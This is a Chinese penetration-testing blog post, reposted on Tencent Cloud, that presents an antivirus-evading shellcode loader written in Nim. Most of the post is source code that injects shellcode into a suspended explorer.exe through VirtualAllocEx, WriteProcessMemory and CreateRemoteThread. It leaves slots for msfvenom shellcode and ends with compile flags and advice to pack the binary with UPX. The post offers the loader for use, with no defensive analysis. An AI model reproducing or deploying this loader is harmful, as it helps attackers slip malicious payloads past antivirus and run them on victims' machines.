渗透测试|NIM最新免杀shellcode加载器

TRY博客-简单的网络技术

发布于 2022-09-08 11:38:53

4630

发布于 2022-09-08 11:38:53

至少我们曾经在一起过。

来自：一言

var xhr = new XMLHttpRequest(); xhr.open('get', 'https://v1.hitokoto.cn/'); xhr.onreadystatechange = function () { if (xhr.readyState === 4) { var data = JSON.parse(xhr.responseText); var hitokoto = document.getElementById('hitokoto'); hitokoto.innerText = data.hitokoto; } } xhr.send();

前言

项目地址：https://github.com/byt3bl33d3r/OffensiveNim

nim社区：https://nim-lang-cn.org/

[aru_3][aru_3][aru_4]

源码

#[
    Author: Marcello Salvati, Twitter: @byt3bl33d3r
    License: BSD 3-Clause
]#

import winim/lean
import osproc

proc injectCreateRemoteThread[I, T](shellcode: array[I, T]): void =

    # Under the hood, the startProcess function from Nim's osproc module is calling CreateProcess() :D
    let tProcess = startProcess("explorer.exe")  #注入的进程
    tProcess.suspend() # That's handy!

    echo "[*] Target Process: ", tProcess.processID

    let pHandle = OpenProcess(
        PROCESS_ALL_ACCESS, 
        false, 
        cast[DWORD](tProcess.processID)
    )

    echo "[*] pHandle: ", pHandle

    let rPtr = VirtualAllocEx(
        pHandle,
        NULL,
        cast[SIZE_T](shellcode.len),
        MEM_COMMIT,
        PAGE_EXECUTE_READ_WRITE
    )

    var bytesWritten: SIZE_T
    let wSuccess = WriteProcessMemory(
        pHandle, 
        rPtr,
        unsafeAddr shellcode,
        cast[SIZE_T](shellcode.len),
        addr bytesWritten
    )

    echo "[*] WriteProcessMemory: ", bool(wSuccess)
    echo "    \\-- bytes written: ", bytesWritten
    echo ""

    let tHandle = CreateRemoteThread(
        pHandle, 
        NULL,
        0,
        cast[LPTHREAD_START_ROUTINE](rPtr),
        NULL, 
        0, 
        NULL
    )

    echo "[*] tHandle: ", tHandle
    echo "[+] Injected"

when defined(windows):

    # https://github.com/nim-lang/Nim/wiki/Consts-defined-by-the-compiler
    when defined(i386):
        # ./msfvenom -p windows/messagebox -f csharp, then modified for Nim arrays
        echo "[*] Running in x86 process"
        var shellcode: array[933, byte] = [
        byte #填写你的shellcode，32位]

    elif defined(amd64):
        # ./msfvenom -p windows/x64/messagebox -f csharp, then modified for Nim arrays
        echo "[*] Running in x64 process"
        var shellcode: array[933, byte] = [
        byte #填写你的shellcode，64位]

    # This is essentially the equivalent of 'if __name__ == '__main__' in python
    when isMainModule:
        injectCreateRemoteThread(shellcode)

编译说明

nim c -d=mingw --app=console --cpu=amd64 -d:danger -d:strip --opt:size shell.nim   #文件名
编译后需要进行upx压缩

本文参与腾讯云自媒体分享计划，分享自作者个人站点/博客。

原始发表：2020-11-24，如有侵权请联系 cloudcommunity@tencent.com 删除

https

网络安全

xml

http

本文分享自作者个人站点/博客前往查看

如有侵权，请联系 cloudcommunity@tencent.com 删除。

本文参与腾讯云自媒体分享计划，欢迎热爱写作的你一起参与！

登录后参与评论

0 条评论

热度

渗透测试|NIM最新免杀shellcode加载器

渗透测试|NIM最新免杀shellcode加载器

至少我们曾经在一起过。

前言

源码

编译说明

社区

活动

资源

关于

腾讯云开发者

热门产品

热门推荐

更多推荐